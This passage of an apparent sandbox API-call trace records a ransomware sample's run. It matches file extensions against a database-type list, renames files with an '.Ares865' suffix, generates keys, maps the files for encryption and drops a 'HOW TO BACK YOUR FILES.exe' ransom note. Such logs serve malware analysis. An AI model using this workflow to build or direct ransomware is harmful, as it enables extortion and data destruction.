lpString2="4dl") returned 1 [0081.621] lstrlenW (lpString="^^^") returned 3 [0081.621] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0081.622] lstrlenW (lpString="abs") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0081.622] lstrlenW (lpString="abx") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0081.622] lstrlenW (lpString="accdb") returned 5 [0081.622] lstrcmpiW (lpString1="6.msi", lpString2="accdb") returned -1 [0081.622] lstrlenW (lpString="accdc") returned 5 [0081.622] lstrcmpiW (lpString1="6.msi", lpString2="accdc") returned -1 [0081.622] lstrlenW (lpString="accde") returned 5 [0081.622] lstrcmpiW (lpString1="6.msi", lpString2="accde") returned -1 [0081.622] lstrlenW (lpString="accdr") returned 5 [0081.622] lstrcmpiW (lpString1="6.msi", lpString2="accdr") returned -1 [0081.622] lstrlenW (lpString="accdt") returned 5 [0081.622] lstrcmpiW (lpString1="6.msi", lpString2="accdt") returned -1 [0081.622] lstrlenW (lpString="accdw") returned 5 [0081.622] lstrcmpiW (lpString1="6.msi", lpString2="accdw") returned -1 [0081.622] lstrlenW (lpString="accft") returned 5 [0081.622] lstrcmpiW (lpString1="6.msi", lpString2="accft") returned -1 [0081.622] lstrlenW (lpString="adb") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0081.622] lstrlenW (lpString="adb") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0081.622] lstrlenW (lpString="ade") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0081.622] lstrlenW (lpString="adf") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0081.622] lstrlenW (lpString="adn") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0081.622] lstrlenW (lpString="adp") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0081.622] lstrlenW (lpString="alf") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0081.622] lstrlenW (lpString="ask") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0081.622] lstrlenW (lpString="btr") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0081.622] lstrlenW (lpString="cat") returned 3 [0081.622] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0081.622] lstrlenW (lpString="cdb") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0081.623] lstrlenW (lpString="ckp") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0081.623] lstrlenW (lpString="cma") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0081.623] lstrlenW (lpString="cpd") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0081.623] lstrlenW (lpString="dacpac") returned 6 [0081.623] lstrcmpiW (lpString1="86.msi", lpString2="dacpac") returned -1 [0081.623] lstrlenW (lpString="dad") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0081.623] lstrlenW (lpString="dadiagrams") returned 10 [0081.623] lstrcmpiW (lpString1="um_x86.msi", lpString2="dadiagrams") returned 1 [0081.623] lstrlenW (lpString="daschema") returned 8 [0081.623] lstrcmpiW (lpString1="_x86.msi", lpString2="daschema") returned -1 [0081.623] lstrlenW (lpString="db-journal") returned 10 [0081.623] lstrcmpiW (lpString1="um_x86.msi", lpString2="db-journal") returned 1 [0081.623] lstrlenW (lpString="db-shm") returned 6 [0081.623] lstrcmpiW (lpString1="86.msi", lpString2="db-shm") returned -1 [0081.623] lstrlenW (lpString="db-wal") returned 6 [0081.623] lstrcmpiW (lpString1="86.msi", lpString2="db-wal") returned -1 [0081.623] lstrlenW (lpString="dbc") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0081.623] lstrlenW (lpString="dbs") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0081.623] lstrlenW (lpString="dbt") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0081.623] lstrlenW (lpString="dbv") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0081.623] lstrlenW (lpString="dbx") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0081.623] lstrlenW (lpString="dcb") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0081.623] lstrlenW (lpString="dct") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0081.623] lstrlenW (lpString="dcx") returned 3 [0081.623] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0081.623] lstrlenW (lpString="ddl") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0081.624] lstrlenW (lpString="dlis") returned 4 [0081.624] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0081.624] lstrlenW (lpString="dp1") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0081.624] lstrlenW (lpString="dqy") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0081.624] lstrlenW (lpString="dsk") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0081.624] lstrlenW (lpString="dsn") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0081.624] lstrlenW (lpString="dtsx") returned 4 [0081.624] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0081.624] lstrlenW (lpString="dxl") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0081.624] lstrlenW (lpString="eco") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0081.624] lstrlenW (lpString="ecx") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0081.624] lstrlenW (lpString="edb") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0081.624] lstrlenW (lpString="epim") returned 4 [0081.624] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0081.624] lstrlenW (lpString="fcd") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0081.624] lstrlenW (lpString="fdb") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0081.624] lstrlenW (lpString="fic") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0081.624] lstrlenW (lpString="flexolibrary") returned 12 [0081.624] lstrcmpiW (lpString1="imum_x86.msi", lpString2="flexolibrary") returned 1 [0081.624] lstrlenW (lpString="fm5") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0081.624] lstrlenW (lpString="fmp") returned 3 [0081.624] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0081.624] lstrlenW (lpString="fmp12") returned 5 [0081.624] lstrcmpiW (lpString1="6.msi", lpString2="fmp12") returned -1 [0081.625] lstrlenW (lpString="fmpsl") returned 5 [0081.625] lstrcmpiW (lpString1="6.msi", lpString2="fmpsl") returned -1 [0081.625] lstrlenW (lpString="fol") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0081.625] lstrlenW (lpString="fp3") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0081.625] lstrlenW (lpString="fp4") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0081.625] lstrlenW (lpString="fp5") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0081.625] lstrlenW (lpString="fp7") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0081.625] lstrlenW (lpString="fpt") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0081.625] lstrlenW (lpString="frm") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0081.625] lstrlenW (lpString="gdb") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0081.625] lstrlenW (lpString="gdb") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0081.625] lstrlenW (lpString="grdb") returned 4 [0081.625] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0081.625] lstrlenW (lpString="gwi") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0081.625] lstrlenW (lpString="hdb") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0081.625] lstrlenW (lpString="his") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0081.625] lstrlenW (lpString="ib") returned 2 [0081.625] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0081.625] lstrlenW (lpString="idb") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0081.625] lstrlenW (lpString="ihx") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0081.625] lstrlenW (lpString="itdb") returned 4 [0081.625] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0081.625] lstrlenW (lpString="itw") returned 3 [0081.625] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0081.626] lstrlenW (lpString="jet") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0081.626] lstrlenW (lpString="jtx") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0081.626] lstrlenW (lpString="kdb") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0081.626] lstrlenW (lpString="kexi") returned 4 [0081.626] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0081.626] lstrlenW (lpString="kexic") returned 5 [0081.626] lstrcmpiW (lpString1="6.msi", lpString2="kexic") returned -1 [0081.626] lstrlenW (lpString="kexis") returned 5 [0081.626] lstrcmpiW (lpString1="6.msi", lpString2="kexis") returned -1 [0081.626] lstrlenW (lpString="lgc") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0081.626] lstrlenW (lpString="lwx") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0081.626] lstrlenW (lpString="maf") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0081.626] lstrlenW (lpString="maq") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0081.626] lstrlenW (lpString="mar") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0081.626] lstrlenW (lpString="marshal") returned 7 [0081.626] lstrcmpiW (lpString1="x86.msi", lpString2="marshal") returned 1 [0081.626] lstrlenW (lpString="mas") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0081.626] lstrlenW (lpString="mav") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0081.626] lstrlenW (lpString="maw") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0081.626] lstrlenW (lpString="mdbhtml") returned 7 [0081.626] lstrcmpiW (lpString1="x86.msi", lpString2="mdbhtml") returned 1 [0081.626] lstrlenW (lpString="mdn") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0081.626] lstrlenW (lpString="mdt") returned 3 [0081.626] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0081.626] lstrlenW (lpString="mfd") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0081.627] lstrlenW (lpString="mpd") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0081.627] lstrlenW (lpString="mrg") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0081.627] lstrlenW (lpString="mud") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0081.627] lstrlenW (lpString="mwb") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0081.627] lstrlenW (lpString="myd") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0081.627] lstrlenW (lpString="ndf") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0081.627] lstrlenW (lpString="nnt") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0081.627] lstrlenW (lpString="nrmlib") returned 6 [0081.627] lstrcmpiW (lpString1="86.msi", lpString2="nrmlib") returned -1 [0081.627] lstrlenW (lpString="ns2") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0081.627] lstrlenW (lpString="ns3") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0081.627] lstrlenW (lpString="ns4") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0081.627] lstrlenW (lpString="nsf") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0081.627] lstrlenW (lpString="nv") returned 2 [0081.627] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0081.627] lstrlenW (lpString="nv2") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0081.627] lstrlenW (lpString="nwdb") returned 4 [0081.627] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0081.627] lstrlenW (lpString="nyf") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0081.627] lstrlenW (lpString="odb") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0081.627] lstrlenW (lpString="odb") returned 3 [0081.627] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0081.627] lstrlenW (lpString="oqy") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0081.628] lstrlenW (lpString="ora") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0081.628] lstrlenW (lpString="orx") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0081.628] lstrlenW (lpString="owc") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0081.628] lstrlenW (lpString="p96") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0081.628] lstrlenW (lpString="p97") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0081.628] lstrlenW (lpString="pan") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0081.628] lstrlenW (lpString="pdb") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0081.628] lstrlenW (lpString="pdm") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0081.628] lstrlenW (lpString="pnz") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0081.628] lstrlenW (lpString="qry") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0081.628] lstrlenW (lpString="qvd") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0081.628] lstrlenW (lpString="rbf") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0081.628] lstrlenW (lpString="rctd") returned 4 [0081.628] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0081.628] lstrlenW (lpString="rod") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0081.628] lstrlenW (lpString="rodx") returned 4 [0081.628] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0081.628] lstrlenW (lpString="rpd") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0081.628] lstrlenW (lpString="rsd") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0081.628] lstrlenW (lpString="sas7bdat") returned 8 [0081.628] lstrcmpiW (lpString1="_x86.msi", lpString2="sas7bdat") returned -1 [0081.628] lstrlenW (lpString="sbf") returned 3 [0081.628] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0081.629] lstrlenW (lpString="scx") returned 3 [0081.629] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0081.629] lstrlenW (lpString="sdb") returned 3 [0081.629] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0081.629] lstrlenW (lpString="sdc") returned 3 [0081.629] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0081.629] lstrlenW (lpString="sdf") returned 3 [0081.629] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0081.629] lstrlenW (lpString="sis") returned 3 [0081.629] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0081.629] lstrlenW (lpString="spq") returned 3 [0081.629] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0081.629] lstrlenW (lpString="te") returned 2 [0081.629] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0081.629] lstrlenW (lpString="teacher") returned 7 [0081.629] lstrcmpiW (lpString1="x86.msi", lpString2="teacher") returned 1 [0081.629] lstrlenW (lpString="tmd") returned 3 [0081.629] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0081.629] lstrlenW (lpString="tps") returned 3 [0081.629] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0081.629] lstrlenW (lpString="trc") returned 3 [0081.629] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0081.630] lstrlenW (lpString="trc") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0081.630] lstrlenW (lpString="trm") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0081.630] lstrlenW (lpString="udb") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0081.630] lstrlenW (lpString="udl") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0081.630] lstrlenW (lpString="usr") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0081.630] lstrlenW (lpString="v12") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0081.630] lstrlenW (lpString="vis") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0081.630] lstrlenW (lpString="vpd") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0081.630] lstrlenW (lpString="vvv") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0081.630] lstrlenW (lpString="wdb") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0081.630] lstrlenW (lpString="wmdb") returned 4 [0081.630] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0081.630] lstrlenW (lpString="wrk") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0081.630] lstrlenW (lpString="xdb") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0081.630] lstrlenW (lpString="xld") returned 3 [0081.630] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0081.630] lstrlenW (lpString="xmlff") returned 5 [0081.630] lstrcmpiW (lpString1="6.msi", lpString2="xmlff") returned -1 [0081.630] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.Ares865") returned 147 [0081.630] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.ares865"), dwFlags=0x1) returned 1 [0081.632] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0081.632] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=147456) returned 1 [0081.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0081.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0081.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0081.632] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0081.633] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0081.633] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0081.633] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x24300, lpName=0x0) returned 0x15c [0081.635] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24300) returned 0x420000 [0081.887] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0081.888] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0081.888] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0081.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0081.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0081.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x328fc8 [0081.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x31f0e0 [0081.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x328fc8 | out: hHeap=0x2b0000) returned 1 [0081.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x31f1f8 [0081.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9fb0 [0081.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f1f8 | out: hHeap=0x2b0000) returned 1 [0081.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9fb0 | out: hHeap=0x2b0000) returned 1 [0081.888] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f0e0 | out: hHeap=0x2b0000) returned 1 [0081.888] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0081.890] CloseHandle (hObject=0x15c) returned 1 [0081.890] CloseHandle (hObject=0x118) returned 1 [0081.890] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0081.890] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0081.890] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0081.891] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb17b200, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfb17b200, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfb17b200, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0081.891] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0081.891] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2548 [0081.891] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0081.891] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfe40 | out: hHeap=0x2b0000) returned 1 [0081.891] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0081.891] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 71 [0081.891] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0081.891] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0081.891] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0081.892] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0081.892] GetLastError () returned 0x0 [0081.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0081.892] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0081.892] CloseHandle (hObject=0x120) returned 1 [0081.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0081.892] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0081.892] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 